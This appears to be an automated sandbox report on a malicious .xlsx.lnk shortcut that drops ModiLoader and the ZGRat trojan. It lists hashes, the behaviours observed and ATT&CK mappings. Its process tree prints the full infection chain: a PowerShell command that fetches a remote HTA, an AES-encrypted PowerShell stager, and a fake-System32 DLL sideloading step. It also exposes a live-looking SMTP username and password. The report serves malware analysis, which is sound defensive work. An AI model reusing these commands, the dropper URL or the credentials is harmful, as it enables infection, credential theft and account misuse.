Analysis

  • max time kernel
    143s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240412-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-04-2024 01:36

General

  • Target

    FT. 40FE CNY .xlsx.lnk

  • Size

    2KB

  • MD5

    82fde340f187a517e0feced1d4972363

  • SHA1

    07740ba4e30a1dbc830451a0d05130ba1af28be9

  • SHA256

    e900f16dc064f78f6d81fda1dc52a17116d4bb578e6ef528e2f04b3e46b434a3

  • SHA512

    db1630813f3a6e19b9c1bfb6dbaecd3829592230635721df5e2121217bbe2ea2a7594eae7061d5d2ce2baf4bfad5687ce22fa58dba94e8e30b0d7630e872f79c

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://www.sessosesso.it/assets/aw/yt.hta

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.irmaklarpaslanmaz.com.tr
  • Port:
    587
  • Username:
    muhasebe@irmaklarpaslanmaz.com.tr
  • Password:
    MH5473588PmZ

Signatures

  • Detect ZGRat V1 27 IoCs
  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • ZGRat

    ZGRat is remote access trojan written in C#.

  • ModiLoader Second Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of SetWindowsHookEx 15 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\FT. 40FE CNY .xlsx.lnk"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" .(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://www.sessosesso.it/assets/aw/yt.hta
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4040
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://www.sessosesso.it/assets/aw/yt.hta
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2168
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $OsFNkdw = 'AAAAAAAAAAAAAAAAAAAAAOeGa50V5wUO7zHydkcFZbJINq4P3H3RMsqOZX56v9Ct1bZUtRZkWxrChczJINV9leAt1ry1WLWkiFuSzfzQFE/yWmqaDZXsneytUPY+5le4m5eM4W+YWzERSnn/urcy8+ZTG58q1h/+BzdOb3w2O1z7QWzthSNzGxOWWNyV7TmYXZCKVR/W4Wq5ilvQCut+dsc1oHeaxo3nDd5I7/VZnRBIlxsN6HcNAACtlxfRiNFMSkDcN8+7W2lqhnFd5fXX+lgvrRG0ld6mdkV9WDBX6QjfiDRmhCmcLWUj1Bf5MNMwFNO28V0dG8tS2l8mIOdvR6aZF2v7aj+0KYrMlbdDhYWFi7OKVRA/3XZLlb5bbQDQE0oOT0JAi3+7gTkWesgJWCHgEueWTWqAMCB6A7qRzrsbpayqU/WAl9/nKC9cB9JhUjr2ITV9Ek3kErAD+eAPojoNd7bQuKjVE9tLoDwyPKo7YLWXTQF8wgZm0Ja3MfKMwkGLjtfBjT7ucygj4kLX/Zk01swB2YhhmuTYGe58LHZYGFngyyCQTKG4k9tN5i5bStEsFZehOTKeivaD+CKVo0hL0r5uz5GQB2ew8dGCUwkPmeXZvkk4B1gaPU3SmBdkVfrvuhGsjc5t6HhSZTvvp6Jz9v2fJj6ahm37dhgqwqsOIhz9dfUsra5c/+Avs0Ho38MGy4FjkP6OU6wM3P9BykwtvTRUlAfl604CotxxEOc6gE6TRnaarDiD6zmwY1sYkKEtTlG2JS0b7n2FWA1GsA==';$JIfveZK = 'cFRkUGZlWWl4R2ZHdlp1WlRocFlZR3RFVUtmamhETUc=';$UGIWRBAh = New-Object 'System.Security.Cryptography.AesManaged';$UGIWRBAh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$UGIWRBAh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$UGIWRBAh.BlockSize = 128;$UGIWRBAh.KeySize = 256;$UGIWRBAh.Key = [System.Convert]::FromBase64String($JIfveZK);$VpSlE = [System.Convert]::FromBase64String($OsFNkdw);$uBmStTPL = $VpSlE[0..15];$UGIWRBAh.IV = $uBmStTPL;$cLYZAvcnc = $UGIWRBAh.CreateDecryptor();$eVtPpVFwq = $cLYZAvcnc.TransformFinalBlock($VpSlE, 16, $VpSlE.Length - 16);$UGIWRBAh.Dispose();$DaRjcu = New-Object System.IO.MemoryStream( , $eVtPpVFwq );$wDjFzJY = New-Object System.IO.MemoryStream;$MtMSBjEhy = New-Object System.IO.Compression.GzipStream $DaRjcu, ([IO.Compression.CompressionMode]::Decompress);$MtMSBjEhy.CopyTo( $wDjFzJY );$MtMSBjEhy.Close();$DaRjcu.Close();[byte[]] $dVtmfGSE = $wDjFzJY.ToArray();$ghWDGW = [System.Text.Encoding]::UTF8.GetString($dVtmfGSE);$ghWDGW | powershell -
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3968
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
            5⤵
            • Blocklisted process makes network request
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3912
            • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
              "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Roaming\Book1.xlsx"
              6⤵
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: AddClipboardFormatListener
              • Suspicious use of SetWindowsHookEx
              PID:1672
            • C:\Users\Admin\AppData\Roaming\uc.exe
              "C:\Users\Admin\AppData\Roaming\uc.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:720
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\UcvuiswbO.bat" "
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:4836
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                  8⤵
                    PID:3644
                  • C:\Windows\SysWOW64\xcopy.exe
                    xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                    8⤵
                    • Enumerates system info in registry
                    PID:4316
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                    8⤵
                      PID:952
                    • C:\Windows\SysWOW64\xcopy.exe
                      xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
                      8⤵
                      • Enumerates system info in registry
                      PID:3648
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
                      8⤵
                        PID:928
                      • C:\Windows\SysWOW64\xcopy.exe
                        xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                        8⤵
                        • Enumerates system info in registry
                        PID:4924
                      • C:\Windows \System32\easinvoker.exe
                        "C:\Windows \System32\easinvoker.exe"
                        8⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1348
                    • C:\Windows\SysWOW64\extrac32.exe
                      C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Admin\AppData\Roaming\uc.exe C:\\Users\\Public\\Libraries\\Ucvuiswb.PIF
                      7⤵
                        PID:4268
                      • C:\Users\Public\Libraries\bwsiuvcU.pif
                        C:\Users\Public\Libraries\bwsiuvcU.pif
                        7⤵
                        • Executes dropped EXE
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of SetWindowsHookEx
                        PID:216

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Persistence

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Privilege Escalation

          Boot or Logon Autostart Execution

          1
          T1547

          Registry Run Keys / Startup Folder

          1
          T1547.001

          Defense Evasion

          Modify Registry

          1
          T1112

          Credential Access

          Unsecured Credentials

          4
          T1552

          Credentials In Files

          3
          T1552.001

          Credentials in Registry

          1
          T1552.002

          Discovery

          Query Registry

          3
          T1012

          System Information Discovery

          4
          T1082

          Collection

          Data from Local System

          4
          T1005

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            6cf293cb4d80be23433eecf74ddb5503

            SHA1

            24fe4752df102c2ef492954d6b046cb5512ad408

            SHA256

            b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

            SHA512

            0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            64B

            MD5

            d8b9a260789a22d72263ef3bb119108c

            SHA1

            376a9bd48726f422679f2cd65003442c0b6f6dd5

            SHA256

            d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

            SHA512

            550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uollzosu.41g.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Roaming\Book1.xlsx
            Filesize

            7KB

            MD5

            1bf87ff1495f215ddfb6c3790dbe6ce9

            SHA1

            68cf7434e8b064ae913ad6f1c35b6fbbfaa611e8

            SHA256

            7af5ae538f476b80c64c21104a5898000e309368ea1515adeea90fb19127503b

            SHA512

            1ff153660a86f0048e0bb24684d2d9508a8eab2b91ea5d844001437d7445f5c7ecf4b0258ea8f033e22160e14583cadefc4e9b1af7f195310a0d0537fb9b7ac5

          • C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
            Filesize

            219B

            MD5

            a78c7a2f12efeec747d8f4301d119d95

            SHA1

            196ba9641b4a0a0f805e696547c4c3605f7dc877

            SHA256

            72513190c8b0fb0ead0238310762adb1e582c58276a456b50f9f3aced9dd6cbb

            SHA512

            313f966d5523929ac7e1c5dbb5a4d260aa63e26dd1d8a75edf7c73eca500aa8efdbbb9c9e6d68aae79ef2929288806e1d5bf33ce086071642df8aff3c06aa58d

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
            Filesize

            855B

            MD5

            a29496047934b2244d10412c026e4b8a

            SHA1

            4e69cee19a8a3214a867f6afe3989e755cd90619

            SHA256

            9b6d564bd8aa05d6e9626961f8f3cf03f04b0bfa4307ff19dcd80b36cfc462ac

            SHA512

            dbb3da33f0bc797be8a3024d479cf6992098d5f491c0210461478c247f3ee2fe8fb48da4f7fe4eef827bfb662496ef87718e311346d6f8f09a56f0c31758d062

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
            Filesize

            24B

            MD5

            4fcb2a3ee025e4a10d21e1b154873fe2

            SHA1

            57658e2fa594b7d0b99d02e041d0f3418e58856b

            SHA256

            90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228

            SHA512

            4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff

          • C:\Users\Admin\AppData\Roaming\uc.exe
            Filesize

            1.6MB

            MD5

            e6ac6ca27aa2d60dc59a21af1ffdb086

            SHA1

            9f847e34521e8917c8b22eca53b71306bc19af18

            SHA256

            a5b3ce892d48757df98fea906dff92e0210dcbd8d1832e43dfbd2a5ece61fba1

            SHA512

            9f4c1e3cb03cd1333a7f2e01f7a3d61803844fc4c1531dd432cc7b7dedc5625d1253715200cb7e0f6b9c7f906a6dcbb488196153e1e2dc935b27b66d74431ee4

          • C:\Users\Public\Libraries\UcvuiswbO.bat
            Filesize

            29KB

            MD5

            828ffbf60677999579dafe4bf3919c63

            SHA1

            a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

            SHA256

            abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

            SHA512

            bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

          • C:\Users\Public\Libraries\bwsiuvcU.pif
            Filesize

            66KB

            MD5

            c116d3604ceafe7057d77ff27552c215

            SHA1

            452b14432fb5758b46f2897aeccd89f7c82a727d

            SHA256

            7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

            SHA512

            9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

          • C:\Users\Public\Libraries\easinvoker.exe
            Filesize

            128KB

            MD5

            231ce1e1d7d98b44371ffff407d68b59

            SHA1

            25510d0f6353dbf0c9f72fc880de7585e34b28ff

            SHA256

            30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

            SHA512

            520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

          • C:\Users\Public\Libraries\netutils.dll
            Filesize

            112KB

            MD5

            6baaea4d3a65281b55173738795eb02c

            SHA1

            1fbe7ec7f5e2d1fb0ab1807e149eee66a86f9224

            SHA256

            0007fa57da2e1de2e487492d00b99abaeca7e9f9cac8a10e24eb569e19f76ee1

            SHA512

            af0285cf961aeae960ede41f195809e9b84ccb262f17f2e994da5c599ebdf712788e5a3f2e0e2ed16e67aa888bdabfd7a6096ad8dda2d062d2f82b010e81d5c5

          • memory/216-201-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-199-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-1237-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-1236-0x0000000075160000-0x0000000075910000-memory.dmp
            Filesize

            7.7MB

          • memory/216-164-0x0000000000400000-0x0000000001400000-memory.dmp
            Filesize

            16.0MB

          • memory/216-1234-0x000000004D7B0000-0x000000004D842000-memory.dmp
            Filesize

            584KB

          • memory/216-1233-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-1232-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-1231-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-1228-0x000000004D1D0000-0x000000004D26C000-memory.dmp
            Filesize

            624KB

          • memory/216-1227-0x000000004D180000-0x000000004D1D0000-memory.dmp
            Filesize

            320KB

          • memory/216-1226-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-1225-0x000000004CA00000-0x000000004CA66000-memory.dmp
            Filesize

            408KB

          • memory/216-218-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-220-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-222-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-216-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-214-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-212-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-166-0x0000000000400000-0x0000000001400000-memory.dmp
            Filesize

            16.0MB

          • memory/216-210-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-208-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-207-0x0000000075160000-0x0000000075910000-memory.dmp
            Filesize

            7.7MB

          • memory/216-205-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-198-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-170-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-202-0x000000004C340000-0x000000004C350000-memory.dmp
            Filesize

            64KB

          • memory/216-167-0x000000004C1F0000-0x000000004C24A000-memory.dmp
            Filesize

            360KB

          • memory/216-203-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-196-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-194-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-192-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-190-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-171-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-169-0x000000004C2D0000-0x000000004C32A000-memory.dmp
            Filesize

            360KB

          • memory/216-168-0x000000004C350000-0x000000004C8F4000-memory.dmp
            Filesize

            5.6MB

          • memory/216-188-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-186-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-173-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-184-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-182-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-180-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-175-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-177-0x000000004C2D0000-0x000000004C323000-memory.dmp
            Filesize

            332KB

          • memory/216-161-0x0000000000400000-0x0000000001400000-memory.dmp
            Filesize

            16.0MB

          • memory/216-179-0x0000000000400000-0x0000000001400000-memory.dmp
            Filesize

            16.0MB

          • memory/216-1235-0x000000004D9E0000-0x000000004D9EA000-memory.dmp
            Filesize

            40KB

          • memory/720-132-0x0000000000400000-0x000000000059C000-memory.dmp
            Filesize

            1.6MB

          • memory/720-109-0x0000000002910000-0x0000000003910000-memory.dmp
            Filesize

            16.0MB

          • memory/720-108-0x0000000002910000-0x0000000003910000-memory.dmp
            Filesize

            16.0MB

          • memory/720-105-0x0000000000890000-0x0000000000891000-memory.dmp
            Filesize

            4KB

          • memory/1348-152-0x00000000613C0000-0x00000000613E3000-memory.dmp
            Filesize

            140KB

          • memory/1672-79-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-66-0x00007FFC15310000-0x00007FFC15320000-memory.dmp
            Filesize

            64KB

          • memory/1672-74-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-1263-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-160-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-1264-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-59-0x00007FFC15310000-0x00007FFC15320000-memory.dmp
            Filesize

            64KB

          • memory/1672-60-0x00007FFC15310000-0x00007FFC15320000-memory.dmp
            Filesize

            64KB

          • memory/1672-61-0x00007FFC15310000-0x00007FFC15320000-memory.dmp
            Filesize

            64KB

          • memory/1672-62-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-63-0x00007FFC15310000-0x00007FFC15320000-memory.dmp
            Filesize

            64KB

          • memory/1672-64-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-82-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-65-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-67-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-68-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-81-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-80-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-69-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-78-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-77-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-75-0x00007FFC129B0000-0x00007FFC129C0000-memory.dmp
            Filesize

            64KB

          • memory/1672-76-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-73-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-71-0x00007FFC129B0000-0x00007FFC129C0000-memory.dmp
            Filesize

            64KB

          • memory/1672-72-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/1672-70-0x00007FFC55290000-0x00007FFC55485000-memory.dmp
            Filesize

            2.0MB

          • memory/3912-53-0x000002E8ED880000-0x000002E8ED890000-memory.dmp
            Filesize

            64KB

          • memory/3912-52-0x000002E8ED880000-0x000002E8ED890000-memory.dmp
            Filesize

            64KB

          • memory/3912-54-0x000002E8EE640000-0x000002E8EE684000-memory.dmp
            Filesize

            272KB

          • memory/3912-51-0x00007FFC35BB0000-0x00007FFC36671000-memory.dmp
            Filesize

            10.8MB

          • memory/3912-55-0x000002E8EE690000-0x000002E8EE706000-memory.dmp
            Filesize

            472KB

          • memory/3912-103-0x00007FFC35BB0000-0x00007FFC36671000-memory.dmp
            Filesize

            10.8MB

          • memory/3968-106-0x00007FFC35BB0000-0x00007FFC36671000-memory.dmp
            Filesize

            10.8MB

          • memory/3968-36-0x00000265FEA90000-0x00000265FEAA0000-memory.dmp
            Filesize

            64KB

          • memory/3968-29-0x00007FFC35BB0000-0x00007FFC36671000-memory.dmp
            Filesize

            10.8MB

          • memory/3968-30-0x00000265FEA90000-0x00000265FEAA0000-memory.dmp
            Filesize

            64KB

          • memory/4040-17-0x00007FFC37440000-0x00007FFC37F01000-memory.dmp
            Filesize

            10.8MB

          • memory/4040-14-0x000002965B120000-0x000002965B130000-memory.dmp
            Filesize

            64KB

          • memory/4040-11-0x000002965B0F0000-0x000002965B112000-memory.dmp
            Filesize

            136KB

          • memory/4040-13-0x000002965B120000-0x000002965B130000-memory.dmp
            Filesize

            64KB

          • memory/4040-12-0x00007FFC37440000-0x00007FFC37F01000-memory.dmp
            Filesize

            10.8MB